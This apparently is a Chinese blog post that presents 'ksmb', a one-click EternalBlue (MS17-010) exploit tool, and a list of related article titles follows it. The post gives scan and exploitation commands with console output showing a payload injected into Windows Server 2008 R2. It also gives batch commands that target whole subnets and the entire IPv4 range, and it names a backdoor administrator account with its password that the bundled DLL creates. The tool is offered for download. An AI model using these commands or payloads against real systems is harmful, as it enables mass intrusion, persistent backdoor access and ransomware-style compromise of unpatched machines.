〖EXP〗NSA MS17010永恒之蓝一键工具
漏洞简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
漏洞检测
无损检测,不会对目标造成任何危害,大家无需担心
Ladon 192.168.1.8 MS17010
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/c MS17010
检测发现存在漏洞高亮显示
独立使用
只需提供IP或IP列表即可自动利用永恒之蓝,当然也可以使用Ladon来批量甚至全网
PS: 由于当时漏洞影响很大,所以并未放出一键批量工具,现在4年过去了,还没打补丁就只能建议开除维护人员了,工具调用的是NSA原版的EXP,所以整个SMBSCAN目录里的文件基本上都是被杀的,这就不方便集成在Ladon里,以免Ladon被所有杀软杀。
C:\Users\k8gege\Desktop\SmbExp>ksmb 192.168.1.89
MS17010-EXP ETERNALBLUE by K8gegeIP: 192.168.1.89
OS: 64-bit 6.1 build 7601 Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE - DANE ETERNALROMANCE - FB ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
只IP默认445端口
ksmb 192.168.1.89
自定义端口
ksmb 192.168.1.89 445
适用于代理出来打,不用考虑做免杀,而且免杀一堆文件也很麻烦
自定义DLL
ksmb 192.168.1.89 445 mydll.dll
注入指定进程
ksmb 192.168.1.89 445 mydll.dll explorer.exe
Ladon调用
使用Ladon可轻松批量使用自己的POC,即只需要实现一个功能,剩下交给Ladon,不用每次来什么新洞都得浪费时间写批量利用工具。除了花一堆时间调式EXP,还得把它弄成批量,批量又得考虑多线程是否兼容POC里的代码等等问题,等写完时效性都过了。Ladon可批量主机、批量URL、批量网段、全网等等,非常方便,下面就是调用ms17010exp的例子。
C:\Users\k8gege\Desktop\SmbExp>Ladon 192.168.1.89 ksmb.exe
Ladon 7.5
Start: 2020-12-17 23:40:16
Runtime: .net 2.0 ME: x64 OS: x64
OS Name: Microsoft Windows 8.1 Enterprise
RunUser: k8gege PR: -IsUser
PID: 5804 CurrentProcess: LadonCall DiyMoudle (c# exe)
load ksmb.exe
ICMP: 192.168.1.89 00-0C-29-CF-FE-E1 VMware
MS17010-EXP ETERNALBLUE by K8gegeIP: 192.168.1.89
OS: 64-bit 6.1 build 7601 Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE - DANE ETERNALROMANCE - FB ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
批量利用
Ladon 192.168.1.89/c ksmb.exe
Ladon 192.168.1.89/24 ksmb.exe
全网扫描
Ladon 0.0.0.0-255.255.255.255 ksmb.exe
成功结果
自带DLL会添加以下管理员用户
k8ms17010exp K8gege520!@#
可替换DLL,执行自定义功能
下载
EXP小密圈内下载
〖EXP〗NSA MS17010永恒之蓝一键工具相关推荐
- Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN
Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN 一.原理 1.Eternalblue可以利用SMB漏洞,结合Doublepulsar ...
- MSF之ms17-010永恒之蓝漏洞利用
MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...
- MS17-010(永恒之蓝)漏洞复现和分析
MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...
- 【网络安全】MS17-010“永恒之蓝”漏洞的利用
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述"永恒之蓝"漏洞的简单利用. 一.实验原理 Eternalblue通过TCP端口445和139来利 ...
- Windows 7 ms17-010永恒之蓝漏洞复现
Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...
- 使用ms17-010永恒之蓝漏洞对win7进行渗透
使用ms17-010永恒之蓝漏洞对win7进行渗透 一.实验目的: 利用ms17-010永恒之蓝漏洞对win7进行渗透: 利用enable_rdp脚本开启远程桌面并创建用户: 关闭主机UAC防护策略并 ...
- MS17-010 “永恒之蓝“ 修复方案
一.预防 1.为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了"永恒之蓝"攻击的系统漏洞,请尽快安装此安全补丁,网址为Microsoft 安全公告 MS17-010 ...
- MS17-010永恒之蓝漏洞的简谈与利用
MS17-010是一个安全类型的补丁. MS17-010更新修复了 Microsoft Windows中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特 ...
- MS17-010永恒之蓝-漏洞利用+修复方法
前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. 该病毒是不法分子利用NSA(National Security Agenc ...
- ”NSA武器库-永恒之蓝“与“Wannacry蠕虫勒索软件”的双剑合璧
5月12日起,大规模勒索病毒软件在全球蔓延,我国大量行业企业内网受到攻击,教育网受损严重,据悉,大量学校电脑感染勒索病毒,重要文件被加密. 这是不法分子利用NSA黑客武器库泄露的"永恒之蓝& ...
最新文章
- 与应用程序松耦合的报表开发组织
- 成功解决ValueError: cannot assign without a target object
- ###STL学习--标准模板库
- display:none;与visibility:hidden;的区别
- LeetCode 1685. 有序数组中差绝对值之和(前缀和)
- 求年龄和的c语言数据类型,第1章 c语言与数据类型.ppt
- golang之终端操作,文件操作
- rollup配置及使用
- Java将每半年发布一个版本
- 解决表格td宽度设置失效问题
- bigdecimal取小数部分_无限小数的本质
- 蜀道难于上青天 四川盆地DEM数据下载
- 着色近似算法——韦尔奇-鲍威尔(Welch-Powell)点着色算法
- PS 在PS中如何等比例放大缩小图片
- 中小学生计算机编程笔试,计算机编程笔试题
- xp系统怎么创建服务器新用户,xp系统ftp服务器创建用户
- 四、vue 项目使用高德地图画面(多边形)
- 史上最简单的图像识别-百度AI开放平台
- 2012意大利之行1:从深圳到罗马_我是亲民_新浪博客
- Day 32 - 透过手机呼叫 Amazon API Gateway 上传图片到 S3